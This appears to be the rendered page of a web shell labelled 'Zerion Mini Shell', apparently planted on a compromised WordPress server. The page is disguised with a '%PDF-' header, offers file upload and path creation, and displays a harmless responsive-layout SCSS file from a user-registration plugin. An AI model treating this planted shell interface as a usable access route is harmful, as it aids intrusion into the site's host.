%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/19851/cwd/wp-content/plugins/user-registration/assets/css/
Upload File :
Create Path :
Current File : //proc/19851/cwd/wp-content/plugins/user-registration/assets/css/user-registration-smallscreen.scss

/**
* user-registration-smallscreen.css
* Optimises the default User Registration frontend layout when viewed on smaller screens.
*/

/**
* Imports
*/
@import 'variables/variables';
@import 'mixins/mixins';

/**
* Style begins
**/
@media screen and (max-width: 768px) {
	.ur-frontend-form {
		.ur-form-row {
			display: -webkit-flex;
			display: flex;
			-webkit-flex-direction: column;
			flex-direction: column;
			.ur-form-grid{
				width: 100% !important;
				margin-bottom: 20px;
				&:nth-child(1n+2) {
					border-left: 1px solid $border_color;
				}
				&:last-child {
					margin-bottom: 0;
					border-left: 0 none;
				}
			}
		}
	}

}

@media screen and (max-width: 600px) {
	#user-registration .user-registration-MyAccount-navigation ul {
		display: block;
		.user-registration-MyAccount-navigation-link {
			display: block;
		}
	}
}

Zerion Mini Shell 1.0